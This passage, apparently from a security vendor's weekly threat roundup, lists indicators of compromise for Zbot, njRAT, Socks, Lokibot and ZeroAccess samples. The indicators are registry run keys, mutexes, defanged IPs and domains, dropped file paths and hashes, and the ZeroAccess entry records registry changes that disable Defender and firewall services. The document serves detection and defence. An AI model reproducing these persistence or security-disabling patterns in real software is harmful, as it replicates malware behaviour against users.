76f99c94e4cb98ecb947dc0add432659cf9510cf0ff75dd532af16f68ca70612 7c15a840a3f2bd987e096d3810991e4f88fe65c9ba6efff2529c1608dfd39e34 7e18585cff88ab47bbdc0d2f9c76ade0d12cf1431983864c260ada790aee3afa 82648de7b9a19b4e1a23933f5c5a24991365fdd97bdb03d0cd95431f38df0b23 842e707c9400e589df5e4be6ec72454403fee00adb174c54b2f2dea3ac1d69d5 85faf6824e603e5bff1ec4e743bd944f2cfdca0098920cbf66467e4d24d8d919 87411b5aee6a4ca4f671b44e63cc9a8e0fc27ed2b43a843cfbe904c428420668 897e054816e7d69c51c73b843c0def266858d0f0eb50425930f975416210868c 8d8821ca5999ec65308100e8a4d7e3bdfe850783161c925789149394f1e071a5 91da6fab3b8e86ba31a0c36eb37787c5bd3723d2f452b59ec5ecac8431a721a3 937d56fae295a0647c6bcea2db66a1f33aefe91db3ab8bb04979ad745d5cd18d 94ac600212f0cb12d2dfb7f2e5a5814160226fa0cd2d545dd2ab32f3057fc92d 9a5b643414e9a3b2b0768123f6c2039c06ec39a1f647201cf284c1785809be2d 9db56c0d7979b0ec84776064129b1a2354d9d3b13f09cff625b106a230fc0caa a4d07da8c28394c58f19e8a7ffb8505386ef714efd4fe9f9d096462233cb7e87 a72e5af5e928da722ded5dee33dba92c9ff07b4c5a7cfdd083c60bc4c6ca6dd3 a7f813ece9b9f797ff84d1d13294892e499ba36e442a118f7f08a3499671e449 a9fc7d3f2b74b0640102d091bd79e5f98887e4bb43ad8bf153cd2e477b67dba6 b13881418dc9d5f70d4ed4da6188806132e6b9d4c7cfa45a6dd426203db5f797 b28117f5e719f5e2c419a9fd0569d40729442d1cff822b1644379986e29c9c50 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-HAKmpx9O84I/XbxdbHZJo2I/AAAAAAAAC38/_4iZQCmKcwo6GEB0WaEzsC9zgjt4SkYCgCLcBGAsYHQ/s1600/560532abb05b4b9219c6206d02defb4ce74f0f07be27173257df016e2576e0c1_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Zbot-7364099-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\\\DSP \nValue Name: 
ChangeNotice ` | 1 \nMutexes | Occurrences \n---|--- \n`-e2a38afdMutex` | 25 \n`FvLQ49Il\u00eeIyLjj6m` | 25 \n`FvLQ49Il IyLjj6m` | 21 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`204[.]79[.]197[.]200` | 25 \n`212[.]83[.]168[.]196` | 21 \n`199[.]2[.]137[.]29` | 21 \n`62[.]112[.]10[.]15` | 21 \n`13[.]107[.]21[.]200` | 13 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`api[.]wipmania[.]com` | 21 \n`n[.]alnisat[.]com` | 21 \n`n[.]jagalot[.]com` | 21 \n`n[.]myadvsit1[.]com` | 21 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\Microsoft\\Exoiom.exe` | 21 \n \n#### File Hashes\n\n` 0cb65d9d8421292e933acf4b5f8aebbe69fcdad0948f8bf711ebf8be9ca23392 0d2b2655e40f10215b306fd47028cf2dffada53d808fec0784514f5a896746d9 11246d210b2edc49c14b00f14791a22b5f2ec12c1be96ce90d5177769a489869 11c83400744d7f64516e1854772373f91b105e66169ba15d5d110f0948bed825 17ca554b2e2a1a6b9412cc2c3e29d6c95e27a24305e879beb1ec3ec6b504d526 1ae7050f136ee52bc82af58ea180ba449e47f1bfde4c27956906ac1ff1913998 25328cbd1c4325abcc27a6a1553fbfe029ca98b10747c2adc5ecee08eef77bc2 25e261c4a20575828b3344d872bd99725fceb952acecf524fa6c3c1267a2e729 2ca7fa29437a2caca2c10c4c347f73d8bb4fed5698a2f78c91b949420fd2b015 306e30cefb63944763afedf2f77f7c9d51d0bcda5d53068c5b832bee4e9bb7b4 31cf80b70149972f55f5064158359386cd1a1e8e3426cd1b9fa922ac994c47e7 3908a42cf0243c333fbd9d5cee753db2e8e44b8e26daabd0336ab3faca57136c 3f1a2e83de8d62377f9c1db5326cedff42b0b3ab6581dd1c8c3a4a52b9498ce9 43d34611fc97e74ee6d88b3b1fddbfd6b97fec6dae41208856e6e0cfbc921007 4453c2ac6b30f16a9560439c542dc42a17c723caab95e63289aa239017d002c1 4664d6a94aeca4dbdd5ec72453be28be2697546f4effc2579b6330b00942011a 519eab7ecc913297fa56b498685eb13e06a9375ba3cd7108057952639f8945bb 5295c963140c0b6022b1c9bb91401d2042ffb715d5a0af394546e788124b058d 5d53c88240b8ac76a3de5ba303bfa805f9730abc2827f149716c5a3ef9776fab 
664aec540c5ad508b5b86c695ebd6e302cd67d7833abe56516365273f735a0b6 68fe7ccc046a6eb48d4bb9b6acf26ca7a22a7379fed0663e83f89492f4bc001a 76d7eb8843a1031e6498584e781934f6546b513658e345081e85f5c2ccee3459 794509058dd3ca5f5e6e1e775c24cd46573c7ed556184f3b67e28abd053167bc 7de6b27ba23da2c1d1ddfc54926b8a770a7da00908516e377c68140ebefa44d5 81bb7e47f2f07cae53dfa7a78ae94625bc49945a99a147b06da9b30f887981f0 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-0iLtt596xc4/Xbxd9OD_MLI/AAAAAAAAC4E/lbAwLKlURXcph7hr2MAHuASaijhVndwZACLcBGAsYHQ/s1600/81bb7e47f2f07cae53dfa7a78ae94625bc49945a99a147b06da9b30f887981f0_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.njRAT-7363922-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\S-1-5-21-2580483871-590521980-3826313501-500 \nValue Name: di ` | 21 \n`<HKCU>\\ENVIRONMENT \nValue Name: SEE_MASK_NOZONECHECKS ` | 21 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: ParseAutoexec ` | 21 \n`<HKCU>\\SOFTWARE\\E99E462D99AD204BDF7D672852A4E30A \nValue Name: [kl] ` | 21 \n`<HKCU>\\SOFTWARE\\E99E462D99AD204BDF7D672852A4E30A ` | 16 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: e99e462d99ad204bdf7d672852a4e30a ` | 7 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: e99e462d99ad204bdf7d672852a4e30a ` | 7 \nMutexes | Occurrences \n---|--- \n`e99e462d99ad204bdf7d672852a4e30a` | 21 \nIP Addresses contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`104[.]22[.]2[.]84` | 14 \n`104[.]22[.]3[.]84` | 9 \n`95[.]185[.]232[.]120` | 1 \n`98[.]124[.]119[.]29` | 1 \n`41[.]141[.]118[.]138` | 1 \n`197[.]26[.]141[.]153` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`pastebin[.]com` | 21 \n`inforhack[.]ddns[.]net` | 3 \n`shadowhakar41[.]ddns[.]net` | 1 \n`osaam2015[.]ddns[.]net` | 1 \n`x5pqt[.]ddns[.]net` | 1 \n`server5319[.]us[.]to` | 1 \n`aqwe[.]ddns[.]net` | 1 \n`hx[.]ddns[.]net` | 1 \n`snokeall[.]ddns[.]net` | 1 \n`animeopening[.]ddns[.]net` | 1 \n`mrzero007[.]ddns[.]net` | 1 \n`sikipon32[.]ddns[.]net` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\dw.log` | 17 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 17 \n`%TEMP%\\svchost.exe` | 12 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\e99e462d99ad204bdf7d672852a4e30a.exe` | 6 \n`%APPDATA%\\svchost.exe` | 2 \n`%APPDATA%\\skype.exe` | 1 \n`%TEMP%\\8c0_appcompat.txt` | 1 \n`%HOMEPATH%\\svchost.exe` | 1 \n`%TEMP%\\dlhost.exe` | 1 \n`%HOMEPATH%\\Hex.exe` | 1 \n`%TEMP%\\Microsoft.exe` | 1 \n \n#### File Hashes\n\n` 059e82f8093d6cc96a0c9b256b91f29a76a504b31e7b99e505f00f1a58fb0fc8 0e456becd300e714371a779408d0e06c9e2d607e4e64357eddfa044a52c16640 2a167630a36ac40de7c8734db7020485e6437e48f7df33254702cdd8970128c0 51e4acbcc40cd882aaad099ae740e95657b309933898ba1d7008c457f0d75cdb 6001923be2f05f19e5061ddf5975f4b8c11f0085328434d6b1926c5a2c6485b9 6d377ec90f4ba0dd424381e05b48c7ed6e92dacc5e8ee3a154c4b770eeb52587 76c67ae939c6a9d187a0bdea6aaa6327984cd3e8de004835eb067ce4ec94ca1e 79fb56495974b83bc55b641f7a242206a539fcc028f66587f9e3c01e954f60b1 82af8835172e86cb143531abfaaf49ba71f5f82087c47bde81982e7f9fb4857a 836067675ad71d653ef9e8cedd07df5e6d15a41e7bc54cdbbaee2fc7764d9d2f 842865c8e038c4cf4da7c65a2c42379548009ddfedf206ac768f4fc443f3fae4 8c8ab50a5fffa135df8e2f8414a7862659dfec13742a511f9ca7f07348f3a44e 
8df49f96d2f23b361c482dc331569827f4de5948cb95b426bf51c5f02d7574e5 92451c9eaec9049c6d787ec783bfacbaa20c4b95380b7247b540419c9b326a15 b56bdfb6b099cfe281a29e3d1f1a08d7fb4d56c0495dad8db010cb207ca73d67 ca1bc558e24135a5d6b79621ad7c236f6ca50c552bbc7b13d8b0d6feecf0a330 d788fe230c34a048d3a9b81464e72b62804447c046fc160ab920fda1ab168d56 e060f062be14913686fec255fae67e79f0042507701289fe8347d15206462df6 e4545c9397b09fa28bfd369bdc28babaee10ec05546bcd674263c0d24244aa07 f17ae58c267b7d0601014165e804580d0044134dc04b1ca50811275df0793ded f6d6b6fae736e1fc4d9bbb52704a7c84cc8bf4981f18ea466793f5aaf545d38a `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-l8k4qj3npM4/XbxeNiQYypI/AAAAAAAAC4M/tQxxSJQSHo4W55rLQ90tVJ_3XG2MOPYsQCLcBGAsYHQ/s1600/ca1bc558e24135a5d6b79621ad7c236f6ca50c552bbc7b13d8b0d6feecf0a330_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.Socks-7363151-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ntuser ` | 24 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: autoload ` | 24 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SCHEDULE \nValue Name: ImagePath ` | 24 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ntuser ` | 24 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: autoload ` | 24 \n`<HKLM>\\SOFTWARE\\CLASSES\\EXEFILE\\SHELL\\OPEN\\COMMAND ` | 24 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`208[.]100[.]26[.]251` | 24 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`fewfwe[.]net` | 24 \n`blinko-usa[.]com` | 24 \n`satellife[.]info` | 24 \nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\cftmon.exe` | 24 \n`%SystemRoot%\\SysWOW64\\drivers\\spools.exe` | 24 \n \n#### File Hashes\n\n` 0e9ce623b6d9979002c965f8d4b8379d16a3cdd71e64edfefb7b46546f760556 158b0aa2b4d23ab0c60e398eaffcc453d3b2135e9ac8501fc6fc8b0181f34916 19037ebfa382219b5a715a3190291091db8c4305cfcfb80ccf7ee6134f24ac2b 2c5f26e9971998e2989d69062df2b4947e52799f3b1e467eca922637cfc4b8a0 4772d7089ed885adeffe0c432f206e84a10038d93aea00713a0fef3ea204d61b 4ab819c524ad7e920bc7fedfce565676c6fdbc952e565bd42da7622456900f5b 4b39a3e4422ff108fbbeb5527524254eff540f48afcb882ef723c86760c01692 4d0b608d4816454ea7c615a51d24d20d25d3db7b424bea47956f3cf610c12a63 564cc6cf1fb9c7f23321ea597da0de78584f663faa3576cc25c876f0ced8539f 6451c75aa10348799759f004bb5f8cec4cab9ca59a243f74af6a92d994ff47ad 6bb0c35cf05218d0f843085b0da1dadead72bb6f3f08c72909c42875d177fac9 7299f47ff48a6286d1cd26a0b7d1e5233dd14af4cb7b1899538f9aa6661194ad 72ad21d29db21fd7519e226f0e50bd12a6c656b3ec14aed124555467373f09c4 748a55b6bb4144523e88a1a6795b22a445d30c142f06f869db1ea79ea879a6dd 8125c5f1f273ce5eafef48762c6886cb9df53a7dd5d41aad058afdab64256c9f 9814aae0363183ef5ae7d960da747db0dc5a644bae9e6f880c2b16f1b06f0de7 bbe846b00154658a2ce4701a08f085b806aebfebec60a5fc7b755bdb16f1db46 cec7f824501284e919c38d9161196136e527b67a8cb5066a2605995ec9833b94 cee25c0db7ab90aa3848e13013b2b02e82f101e473544ed802dc57242e54acfc cf8478480f7974884ce7a9d817b4ded724f2d1c77638273fbeaa3f086d1905ad d814df1c7a8edf3d4ce11091595ffd5d25b5a79de1891b39dc8ddfd8c00353c2 da967dec24f5455ed8910f3d7df93c60319fba735a29e2e09401db4b6b7a057c f713344d26bc5ad3d88efd93473acbbde824c4d4f0e1a70fb690d9bfe27a2bff f74c53738e554de22236498e91bef767351ac06a677eb2192ee09182eec203a4 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A 
\nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-gJNzd81eKTo/XbxeeM_mPEI/AAAAAAAAC4U/YmK8GP1qIS0FA7fT8u_3EhaXVDGwsVnAQCLcBGAsYHQ/s1600/6451c75aa10348799759f004bb5f8cec4cab9ca59a243f74af6a92d994ff47ad_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Lokibot-7363866-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\WINRAR ` | 3 \n`<HKCU>\\SOFTWARE\\WINRAR \nValue Name: HWID ` | 2 \n`<HKLM>\\SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000003E9 \nValue Name: F ` | 2 \n`<HKLM>\\SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000001F5 \nValue Name: F ` | 2 \n`<HKLM>\\SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000003EC \nValue Name: F ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 8PKXHTYXYR ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: KV1LBH_H1V ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: JPXX3LNHNHY ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: PHLL54I ` | 1 \nMutexes | Occurrences \n---|--- \n`3749282D282E1E80C56CAE5A` | 12 \n`3BA87BBD1CC40F3583D46680` | 11 \n`8-3503835SZBFHHZ` | 4 \n`6M1O492E903A660D` | 4 \n`S-1-5-21-2580483-1060168328224` | 2 \n`Global\\ee9ec621-fa96-11e9-a007-00501e3ae7b5` | 1 \n`S-1-5-21-2580483-6362420053499` | 1 \n`S-1-5-21-2580483-19562420053499` | 1 \n`S-1-5-21-2580483-13882420053499` | 1 \n`S-1-5-21-2580483-11682420053499` | 1 \nIP Addresses contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`104[.]247[.]73[.]132` | 10 \n`62[.]149[.]128[.]45` | 2 \n`198[.]54[.]117[.]200` | 2 \n`47[.]91[.]169[.]15` | 2 \n`198[.]49[.]23[.]144/31` | 2 \n`172[.]80[.]15[.]9` | 2 \n`185[.]149[.]23[.]24` | 2 \n`45[.]43[.]35[.]96/31` | 2 \n`213[.]186[.]33[.]5` | 1 \n`50[.]63[.]202[.]52` | 1 \n`91[.]195[.]240[.]126` | 1 \n`23[.]20[.]239[.]12` | 1 \n`184[.]168[.]131[.]241` | 1 \n`52[.]58[.]78[.]16` | 1 \n`81[.]88[.]57[.]68` | 1 \n`183[.]90[.]245[.]41` | 1 \n`162[.]213[.]255[.]220` | 1 \n`162[.]211[.]181[.]225` | 1 \n`213[.]239[.]221[.]71` | 1 \n`198[.]54[.]117[.]218` | 1 \n`173[.]247[.]243[.]182` | 1 \n`203[.]238[.]182[.]106` | 1 \n`103[.]75[.]189[.]246` | 1 \n`77[.]72[.]0[.]138` | 1 \n`69[.]16[.]230[.]43` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`devhaevents[.]us` | 10 \n`www[.]nadidetadllar[.]com` | 3 \n`28080[.]com` | 2 \n`www[.]peizi33[.]com` | 2 \n`www[.]zgtmn[.]com` | 2 \n`www[.]neurofoodmarketing[.]com` | 2 \n`www[.]dc-eas[.]com` | 2 \n`www[.]wls11[.]com` | 2 \n`www[.]the-conference-buddies[.]com` | 2 \n`www[.]parapuglia[.]com` | 2 \n`www[.]wemovieblog[.]info` | 2 \n`www[.]browneyedbakerfun[.]com` | 2 \n`www[.]zjko2o[.]com` | 2 \n`www[.]cryptogage[.]com` | 2 \n`cn-list[.]info` | 2 \n`www[.]xn--u2u404a[.]ink` | 2 \n`www[.]stvple[.]com` | 2 \n`www[.]ledean-pauvert[.]com` | 2 \n`www[.]ms-field[.]net` | 2 \n`www[.]2zh4m[.]com` | 1 \n`www[.]66463dh[.]com` | 1 \n`www[.]moveoptimizer[.]com` | 1 \n`www[.]onmyoji-kouryaku[.]com` | 1 \n`www[.]1399pk10[.]com` | 1 \n`mindslaver[.]com` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\D282E1\\1E80C5.lck` | 12 \n`%APPDATA%\\Microsoft\\Crypto\\RSA\\S-1-5-21-2580483871-590521980-3826313501-500\\a18ca4003deb042bbee7a40f15e1970b_d19ab989-a35f-4710-83df-7b2db7efe7c5` | 12 \n`%APPDATA%\\D1CC40\\0F3583.lck` | 11 
\n`%APPDATA%\\Microsoft\\Crypto\\RSA\\S-1-5-21-1258710499-2222286471-4214075941-500\\a18ca4003deb042bbee7a40f15e1970b_8f793a96-da80-4751-83f9-b23d8b735fb1` | 11 \n`%TEMP%\\bill file.exe` | 11 \n`%APPDATA%\\D1CC40\\0F3583.exe (copy)` | 9 \n`%APPDATA%\\D282E1` | 7 \n`%APPDATA%\\6M1O492E\\6M1logim.jpeg` | 7 \n`%APPDATA%\\6M1O492E\\6M1logrc.ini` | 7 \n`%APPDATA%\\6M1O492E\\6M1logri.ini` | 7 \n`%APPDATA%\\D1CC40\\0F3583.hdb` | 5 \n`%APPDATA%\\6M1O492E\\6M1logrv.ini` | 4 \n`%System32%\\Tasks\\Attractableness` | 3 \n`%ProgramData%\\hellderbind.exe` | 3 \n`%ProgramData%\\HELLDE~1.EXE` | 2 \n`\\Documents and Settings\\All Users\\hellderbind.exe` | 2 \n`%SystemRoot%\\Tasks\\Attractableness.job` | 2 \n`%TEMP%\\A1ED.dmp` | 1 \n`%TEMP%\\8D7A.dmp` | 1 \n`%TEMP%\\bin.exe` | 1 \n`%APPDATA%\\-L951SVT\\-L9logim.jpeg` | 1 \n`%APPDATA%\\-L951SVT\\-L9logrc.ini` | 1 \n`%APPDATA%\\-L951SVT\\-L9logri.ini` | 1 \n`%TEMP%\\52843.bat` | 1 \n`%ProgramFiles(x86)%\\Dmdvpl4r8\\IconCacheebvhjrz.exe` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0b1ec867f89cabea9e5a4750f7c7ba76ba255b417341b13351bde26733827d5e 124f01bbbcc20d33191c4d2bb756d7b4be9fd98b1c18dd0bafc2f5a1a0119a7c 1536d75683e29eb947bd08c622687c23e96b0a5b7192650d2c0e0b71b523f53b 3199c726488205e1e39d826666ddb14e567283dc1912b94688bf80623e3bb8b1 46d599a3253021c45a373cd9f324d1fe9b97a28a9b2ca57685621557296a736f 4a7483bd09d881a0c9b94077d2fa308eebcd44988dabf866b481c9dfd4d211da 68e514e18e7353c018dd48e6f237e5f7c57def18a357156ffca7dd3826ee7426 72b2e6a534b504d1e5871293956412bf8b198ae71139312592755bfe8a5cbfab 7a675a25cd30dc40dba8e32cbdc499089dcbc5a994150d8466497f14619ae6ba 8e89f43a20be6022d88e7ba6821a91e5f2ade5882ba8de7e86e449ba497e56cc c4294beaabec49ed4dede08037b48667ac91dbf9eb4cff60e987b1906d7e35f1 ca5eeac3a04231f26f71646ec3f62c867d42fef71dcd677cb4e2a01a986a80eb d0a46670613cb3711bb0c690f75768640e6867b53ee2866f1952bb3b39436f59 dbe53d918accbf4b75025ad3b525ebce8547c913808ef547e8b9d67114113b1c 
f966a33cbaba9b97cb874d8b8d17544c856db7544c7bb2a09d3d2535a8e28fd5 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-xCcGqnivNxQ/XbxewjTnGbI/AAAAAAAAC4c/WdI40J-Cu4AQ4_GC7FTbxcPKhUfX3uM1ACLcBGAsYHQ/s1600/46d599a3253021c45a373cd9f324d1fe9b97a28a9b2ca57685621557296a736f_amp.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-kK37vBh0HN0/Xbxe0w5yovI/AAAAAAAAC4g/bgJBe457GSQb6TElE8YyWN9LkCvWVV7HwCLcBGAsYHQ/s1600/46d599a3253021c45a373cd9f324d1fe9b97a28a9b2ca57685621557296a736f_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Zeroaccess-7358361-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Start ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: DeleteFlag ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: Start ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: Start ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: Start ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IPHLPSVC \nValue Name: Start ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: DeleteFlag ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: DeleteFlag ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: DeleteFlag ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BROWSER \nValue Name: Start ` | 21 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Windows Defender ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: Type ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: ErrorControl ` | 21 
\n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: Type ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: ErrorControl ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IPHLPSVC \nValue Name: Type ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IPHLPSVC \nValue Name: ErrorControl ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IPHLPSVC \nValue Name: DeleteFlag ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Type ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: ErrorControl ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: Type ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: ErrorControl ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BFE \nValue Name: Type ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BFE \nValue Name: Start ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BFE \nValue Name: ErrorControl ` | 21 \nMutexes | Occurrences \n---|--- \n`Global\\82f0e161-f7c1-11e9-a007-00501e3ae7b5` | 1 \n`Global\\a280e5c1-f7c1-11e9-a007-00501e3ae7b5` | 1 \n`Global\\d6367241-f7c1-11e9-a007-00501e3ae7b5` | 1 \nIP Addresses contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`83[.]133[.]123[.]20` | 14 \n`212[.]253[.]253[.]254` | 9 \n`218[.]144[.]173[.]167` | 8 \n`98[.]248[.]140[.]174` | 7 \n`76[.]119[.]18[.]160` | 6 \n`82[.]130[.]158[.]137` | 6 \n`24[.]222[.]83[.]135` | 6 \n`1[.]161[.]150[.]169` | 6 \n`65[.]36[.]75[.]132` | 6 \n`50[.]7[.]216[.]66` | 5 \n`166[.]82[.]93[.]190` | 5 \n`36[.]2[.]141[.]192` | 5 \n`184[.]90[.]23[.]168` | 4 \n`72[.]189[.]202[.]136` | 4 \n`37[.]19[.]241[.]169` | 4 \n`31[.]134[.]253[.]187` | 4 \n`110[.]226[.]47[.]156` | 4 \n`74[.]88[.]57[.]193` | 4 \n`184[.]38[.]240[.]175` | 4 \n`5[.]43[.]242[.]139` | 4 \n`152[.]7[.]6[.]164` | 4 \n`190[.]105[.]127[.]197` | 4 \n`98[.]69[.]146[.]176` | 4 \n`86[.]124[.]234[.]155` | 4 \n`80[.]116[.]95[.]189` | 4 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`j[.]maxmind[.]com` | 21 \nFiles and or directories created | Occurrences \n---|--- \n`%System32%\\LogFiles\\Scm\\e22a8667-f75b-4ba9-ba46-067ed4429de8` | 21 \n`\\@` | 21 \n`\\L\\eexoxfxs` | 21 \n`\\systemroot\\Installer\\{0f210b53-2df0-43a6-b654-d5b43088f74f}` | 16 \n`\\systemroot\\system32\\services.exe` | 16 \n`%System32%\\services.exe` | 16 \n`%SystemRoot%\\Installer\\{0f210b53-2df0-43a6-b654-d5b43088f74f}\\@` | 16 \n`%SystemRoot%\\Installer\\{0f210b53-2df0-43a6-b654-d5b43088f74f}\\L` | 16 \n`%SystemRoot%\\Installer\\{0f210b53-2df0-43a6-b654-d5b43088f74f}\\U` | 16 \n`\\systemroot\\assembly\\GAC_32\\Desktop.ini` | 5 \n`\\systemroot\\assembly\\GAC_64\\Desktop.ini` | 5 \n`\\$Recycle.Bin\\S-1-5-18` | 5 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f` | 5 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\@` | 5 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\L` | 5 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\U` | 